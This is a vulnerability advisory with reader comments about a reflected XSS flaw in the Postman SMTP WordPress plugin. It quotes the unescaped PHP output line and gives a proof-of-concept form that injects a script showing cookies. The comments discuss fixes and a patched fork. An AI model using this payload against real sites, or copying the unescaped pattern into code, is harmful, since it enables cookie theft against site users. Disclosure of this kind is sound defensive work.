Reflected Cross-Site Scripting (XSS) Vulnerability in Postman SMTP
We recently found the the plugin Postman SMTP contains a reflected cross-site scripting (XSS) vulnerability.
On line 346 of the file /Postman/Postman-Email-Log/PostmanEmailLogController.php the value of GET or POST input “page” is output without being escaped:
value="<?php echo $_REQUEST['page'] ?>" />
While the GET input “page” needs to be set to “postman_email_log” for that code to run, the POST input can be set to another value and depending on the configuration of PHP will be the one chosen to be output.
The website of the developer is down and we couldn’t find any other method to contact them directly. The plugin was last updated 16 months ago and is only listed as being compatible up to WordPress 4.4, so it doesn’t look like it is being maintained at this time.
Proof of Concept
The following proof of concept will cause any available cookies to be shown in alert box. Major web browsers other than Firefox provide XSS filtering, so this proof of concept will not work in those web browsers.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html> <body> <form action="http://[path to WordPress]/wp-admin/tools.php?page=postman_email_log" method="POST"> <input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' /> <input type="submit" value="Submit" /> </form> </body> </html>
Hi,
Thank you for disclosing this vulnerability. This morning I was able to contact “Postman SMTP” developer, Jason Hendriks –although it was not an easy task ;)–. He was not aware of the fact his plugin had recently been removed from the official WordPress plugins directory. He said he would take a look.
One more thing, would this be a good fix?
value=”” />(credits to @jasonpomerleau)
PS: I can see the code I provided within code tags looks messed up, I would was making a reference to this solution https://wordpress.org/support/topic/postman-smtp-maileremail-log-is-prone-to-a-cross-site-scripting-vulnerability/#post-9555322
The recommended WordPress escaping function for where the value is being output in this situation is esc_attr().
Did you guys try to reach the author of Postman SMTP via Linkedin? https://ca.linkedin.com/in/jason-hendriks-66b36b33
No, we didn’t see any link to that in anything related to the plugin.
Yes that’s how I reached him the other day.
Pingback: The High Cost of Free Plugins - Awesome Support
They removed a 100.000 copy plugin just for this? are we sure that this is the solution ?
thnx
Someone named Yehuda Hassine has uploaded a fixed version in GitHub (https://github.com/yehudah/Postman-SMTP).
I can see he has modified the following files:
• /Postman-Auth/PostmanGoogleAuthenticationManager.php
• /Postman-Auth/PostmanMicrosoftAuthenticationManager.php
• /Postman-Auth/PostmanYahooAuthenticationManager.php
• /Postman-Email-Log/PostmanEmailLogController.php
• /Postman-Email-Log/PostmanEmailLogService.php
• /PostmanAjaxController.php
• /PostmanUtils.php
He has used FILTER_SANITIZE_STRING and intval.
BIG NEWS!
The fork (fixed version of “Postman SMTP Mailer/Email Log”) by Yehuda Hassine (props to him!) has got approved in the WordPress Directory. Fortunately, in the end, “Postman SMTP Mailer/Email Log” is going to survive, under the name of “Post SMTP Mailer/Email Log”. You can find it in https://wordpress.org/plugins/post-smtp/.
The Github repo has been moved here: https://github.com/yehudah/Post-SMTP.
Long life to Post SMTP Mailer/Email Log!
Thank you @yehudah!